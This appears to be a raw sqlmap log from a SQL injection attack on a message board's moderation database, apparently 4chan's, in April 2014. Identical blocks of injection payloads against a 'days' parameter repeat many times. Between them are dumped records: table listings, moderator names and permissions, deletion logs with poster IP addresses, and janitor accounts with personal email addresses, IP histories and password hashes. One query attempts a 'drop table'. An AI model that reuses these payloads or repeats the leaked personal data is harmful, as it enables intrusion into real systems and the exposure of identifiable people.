Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select count(*) from pass_users: '12740'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sleect * from mod users limit 1; drop table joshfjdh [1]:
databases [1]:
show databases [1]:
select flags from mod_users; [7]:
[*]
[*] developer
[*] developer,blacklist
[*] html
[*] postfilter
[*] postfilter,blacklist
[*] postfilter,iprangebans,blacklist,html
select username,flags from mod_users; [10]:
[*] moot, developer
[*] Mr VacBob, developer
[*] Zephro,
[*] rabidkimba,
[*] bat-guano,
[*] ALTERNATIVE, postfilter,blacklist
[*] Katsu,
[*] Kobra,
[*] menchi,
[*] Zorpheus,
select username,flags from mod_users where flags != ''; [7]:
[*] moot, developer
[*] Mr VacBob, developer
[*] ALTERNATIVE, postfilter,blacklist
[*] invisibro, postfilter,iprangebans,blacklist,html
[*] HotShot, postfilter
[*] Aerolite, html
[*] desuwa, developer,blacklist
show tables; [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from actions_log order by id desc limit 1 [11]:
[*]
[*] 0
[*] 1336189574755.gif
[*] 2
[*] 2014-04-21 01:28:38
[*] 31419
[*] 543202338
[*] Anonymous
[*] b
[*] fsdfdsf
[*] ITT: God Tier Music.
select * from actions_log order by id desc limit 5 [4]:
[*] Aerolite, mlp, Why the fuck isn't thre a sticky? Is there no, image-1130022361.jpg, 31400, Anonymous, 2, 0, 17340318, , 2014-04-19 09:51:43
[*] Aerolite, mlp, How did I do? She's a whale, I'm just lo, Discord_lamp_S4E22.png, 31399, Anonymous, 1, 0, 17340412, Today's episode, 2014-04-19 09:45:55
[*] RapeApe, tv, , thatfeel.gif, 31417, Anonymous, 2, 0, 26213024, , 2014-04-20 23:01:10
[*] InspRedwood, fit, Crap. What do? \n\n<strong style="color: red;">(USER WAS BANNED FOR THIS POST)</strong>, image.jpg, 31416, Anonymous, 2, 0, 26213159, , 2014-04-20 22:57:55
select * from actions_log where admin='moot' order by id desc limit 5 [2]:
[*] moot, g, Grab ffmpeg from https://www.ffmpeg.org/download.htm<wbr>l\n\nIt's a command line tool whic, webmspin.webm, 31375, Anonymous, 4, 5, 41212767, Quick VP8 encoding guide for WebM, 2014-04-18 00:10:49
[*] moot, test, , team_4chan_meetup.webm, 31337, Anonymous, 1, 0, 12760, The New WebM General, 2014-04-14 14:35:25
select * from actions_log where admin='moot' limit 5 [1]:
[*] moot, b, hey /b/, if a girl farted on your boner, w, 1119060667050, 21, Anonymous, 0, 1, 6184205, , 2006-03-29 06:46:10
select * from actions_log where admin='moot' order by ts desc limit 5 [1]:
[*] moot, g, Grab ffmpeg from https://www.ffmpeg.org/download.htm<wbr>l\n\nIt's a command line tool whic, webmspin.webm, 31375, Anonymous, 4, 5, 41212767, Quick VP8 encoding guide for WebM, 2014-04-18 00:10:49
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from del_log order by id desc limit 1 [13]:
[*]
[*] ._.,.png
[*] 0
[*] 1
[*] 11382736
[*] 2014-04-21 01:36:15
[*] 543202338
[*] 543210417
[*] 71.239.241.134
[*] ahh fuck it...you guys have fun
[*] Anonymous
[*] b
[*] Troid
select * from del_log where admin='moot' order by id desc limit 1 [12]:
[*]
[*] 0
[*] 0000tiniestimagebanever.jpg
[*] 1
[*] 11382689
[*] 121.219.238.59
[*] 2014-04-21 01:28:26
[*] 543209020
[*] Anonymous
[*] b
[*] moot
[*] This is the official chucklefuck thread.\nIf you see another chucklefuck thread, then fuck off
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from boardlist [6]:
[*] boards, 1, 3, 0, img, Hentai/Alternative, ayase
[*] boards, 1, a, 0, img, Ecchi, ayase
[*] boards, 1, adv, 0, img, Hentai, ayase
[*] boards, 1, an, 0, img, High Resolution, ayase
[*] boards, 1, asp, 0, img, Yuri, ayase
[*] boards, 1, b, 0, img, Yaoi, ayase
select server from boardlist group by server [2]:
[*] ayase
select DISTINCT(server) from boardlist [1]:
select server from boardlist where server = "ayase" [1]:
[*] ayase
select name, server from boardlist [39]:
[*] Hentai/Alternative, ayase
[*] Ecchi, ayase
[*] Hentai, ayase
[*] High Resolution, ayase
[*] Yuri, ayase
[*] Yaoi, ayase
[*] Wallpapers/General, ayase
[*] Anime & Manga, ayase
[*] Anime/Cute, ayase
[*] Technology, ayase
[*] Weapons, ayase
[*] Mecha, ayase
[*] Auto, ayase
[*] Photography, ayase
[*] Video Games, ayase
[*] Anime/Wallpapers, ayase
[*] Cute/Male, ayase
[*] Random, ayase
[*] Request, ayase
[*] Sexy Beautiful Women, ayase
[*] Torrents, ayase
[*] Adult GIF, ayase
[*] Flash, ayase
[*] Artwork/Critique, ayase
[*] Comics & Cartoons, ayase
[*] Papercraft & Origami, ayase
[*] Music, ayase
[*] Television & Film, ayase
[*] Food & Cooking, ayase
[*] Oekaki, ayase
[*] Cosplay & EGL, ayase
[*] Animals & Nature, ayase
[*] Traditional Games, ayase
[*] Paranormal, ayase
[*] Toys, ayase
[*] Travel, ayase
[*] Sports, ayase
[*] Transportation, ayase
[*] Fashion, ayase
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select name, server from boardlist [42]:
[*] Hentai/Alternative, ayase
[*] Ecchi, ayase
[*] Hentai, ayase
[*] High Resolution, ayase
[*] Yuri, ayase
[*] Yaoi, ayase
[*] Wallpapers/General, ayase
[*] Anime & Manga, ayase
[*] Anime/Cute, ayase
[*] Technology, ayase
[*] Weapons, ayase
[*] Mecha, ayase
[*] Auto, ayase
[*] Photography, ayase
[*] Video Games, ayase
[*] Anime/Wallpapers, ayase
[*] Cute/Male, ayase
[*] Random, ayase
[*] Request, ayase
[*] Sexy Beautiful Women, ayase
[*] Torrents, ayase
[*] Adult GIF, ayase
[*] Flash, ayase
[*] Artwork/Critique, ayase
[*] Comics & Cartoons, ayase
[*] Papercraft & Origami, ayase
[*] Music, ayase
[*] Television & Film, ayase
[*] Food & Cooking, ayase
[*] Oekaki, ayase
[*] Cosplay & EGL, ayase
[*] Animals & Nature, ayase
[*] Traditional Games, ayase
[*] Paranormal, ayase
[*] Toys, ayase
[*] Travel, ayase
[*] Sports, ayase
[*] Transportation, ayase
[*] Fashion, ayase
[*] Fitness, ayase
[*] Otaku Culture, ayase
[*] Advice, ayase
select name, server from boardlist where dir='b' [1]:
[*] Random, ayase
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from actions_log where admin='moot' order by ts desc limit 5 [2]:
[*] moot, g, Grab ffmpeg from https://www.ffmpeg.org/download.htm<wbr>l
It's a command line tool whic, webmspin.webm, 31375, Anonymous, 4, 5, 41212767, Quick VP8 encoding guide for WebM, 2014-04-18 00:10:49
[*] moot, test, , team_4chan_meetup.webm, 31337, Anonymous, 1, 0, 12760, The New WebM General, 2014-04-14 14:35:25
select * from actions_log where admin='moot'; [1]:
[*] moot, b, hey /b/, if a girl farted on your boner, w, 1119060667050, 21, Anonymous, 0, 1, 6184205, , 2006-03-29 06:46:10
select * from actions_log where admin='moot' order by id desc [3]:
[*] moot, g, Grab ffmpeg from https://www.ffmpeg.org/download.htm<wbr>l\n\nIt's a command line tool whic, webmspin.webm, 31375, Anonymous, 4, 5, 41212767, Quick VP8 encoding guide for WebM, 2014-04-18 00:10:49
[*] moot, test, , team_4chan_meetup.webm, 31337, Anonymous, 1, 0, 12760, The New WebM General, 2014-04-14 14:35:25
[*] moot, jp, Hey guys its Sakura season now marking the beginning of spring.\n\nMore importantly it symbolizes the brief and transient nature of life and that we should embrace every moment.\n\nSimilarly, I for one thoroughly enjoy my time here on /jp/ with you magnificent and beautiful people.\n\nSo lets take advantage of this opportunity, post Sakura pictures, have our own little /jp/ hanami, take it easy and get to know and appreciate our fellow /jp/sies., sakuraoka.jpg, 31147, Anonymous, 24, 0, 12014966, , 2014-04-03 14:02:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
database management system users privileges:
[*] 'backend_admin'@'10.0.0.0/255.255.255.0' [1]:
privilege: USAGE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from mod_users order by id desc [3]:
[*] janitor, m, , Fourtheo@live.com, , 339, {"24.85.70.165":1397976147}, 2654, 2014-04-19 21:12:24, $2y$10$V7JYgJcVwHrpxvjLJ4fSNuc7GUu6dfMSQZ3q.XQpcV9Y4fFudFa3u, 0, MRC-F20
[*] janitor, gif, , virginbbc@gmail.com, , 338, {"98.80.219.107":1397976201}, 1047, 2014-04-18 14:21:30, $2y$10$lsnb2ekr2jFaSdQQmGAmwOiWo2i6UAdgVLGoMawaJBAtkvTbNZxGO, 0, vBBC
[*] janitor, pol, , hammerandspork@hotmail.com, , 337, {"50.149.82.43":1397975643,"10.0.0.19":1397973579}, 870, 2014-04-17 18:09:31, $2y$10$/7EH1NroU/kzVu2MsYVlXOciGSjNkTR4NFCeYLK3.x.4YiAzarUtu, 0, Cryswar
select * from mod_users order by id desc [18]:
[*] janitor, m, , Fourtheo@live.com, , 339, {"24.85.70.165":1397976147}, 2654, 2014-04-19 21:12:24, $2y$10$V7JYgJcVwHrpxvjLJ4fSNuc7GUu6dfMSQZ3q.XQpcV9Y4fFudFa3u, 0, MRC-F20
[*] janitor, gif, , virginbbc@gmail.com, , 338, {"98.80.219.107":1397976201}, 1047, 2014-04-18 14:21:30, $2y$10$lsnb2ekr2jFaSdQQmGAmwOiWo2i6UAdgVLGoMawaJBAtkvTbNZxGO, 0, vBBC
[*] janitor, pol, , hammerandspork@hotmail.com, , 337, {"50.149.82.43":1397975643,"10.0.0.19":1397973579}, 870, 2014-04-17 18:09:31, $2y$10$/7EH1NroU/kzVu2MsYVlXOciGSjNkTR4NFCeYLK3.x.4YiAzarUtu, 0, Cryswar
[*] janitor, hm, , andrew.hartpence@gmail.com, , 336, {"72.186.234.178":1398153243,"10.0.0.19":1398124574,"64.56.83.90":1398094940,"64.56.89.67":1398105350}, 866, 2014-04-21 01:12:06, $2y$10$edZha3aTIxq8JakVnh/8Ru4z/8l9OiQP.DO3yUOqBtxwclqRu0uoa, 0, Drew1895
[*] janitor, toy, , delicatelyinthevagina@gmail.com, , 335, {"24.239.213.216":1398139006,"10.0.0.19":1398115092}, 4159, 2014-04-16 12:05:41, $2y$10$yyzNgTb67B7UfuPbEbnRQ.xL.0zFWzHVqXKPo2ytwlq2NjtSQ50B., 0, cotoye
[*] janitor, k, , eamon_actual@outlook.com, , 334, {"182.19.128.219":1397566358}, 4118, 2014-04-15 08:48:07, $2y$10$P/s9hi1ZhKJRK3VhNAFDb.l1NNUOBiPC7LfhSWTONMhyIT1bRkbMS, 0, MoistNugget
[*] janitor, fa, , DommFerger@gmail.com, , 333, {"99.100.238.168":1398143802,"10.0.0.19":1398143762,"50.241.209.201":1398126529}, 4611, 2014-04-21 14:44:14, $2y$10$rW23pkScmF2teCi06gIFvOz0nd7QqT2xf.nROrYI.o2T/1f1Ycj2S, 0, Starfrog
[*] janitor, vp, , elgyem@yahoo.com, , 332, {"128.54.209.216":1398066449,"128.54.206.151":1398157647,"10.0.0.19":1398153920,"169.228.145.73":1397504911,"169.228.154.41":1397782173,"137.110.44.179":1397838410,"169.228.151.105":1398108529}, 4065, 2014-04-14 03:33:52, $2y$10$cGODRUhvCl9N3VDsql5m2e0Q6yiGbnPn5f60EvQErF2C0ev4pyBgK, 0, Sylvian
[*] janitor, ck, , kanesauchuk@gmail.com, , 331, {"128.226.230.230":1398135779,"72.170.136.10":1397971219,"10.0.0.19":1398131724,"70.209.133.36":1397495685,"70.215.11.180":1397694106,"24.161.89.131":1397783690}, 3480, 2014-04-21 20:52:00, $2y$10$T/YXXiH9BZPTNfJnhjzcieBMEDDur6MSoAwRKvjt5dSo5uZ8jpC7O, 0, hexagon
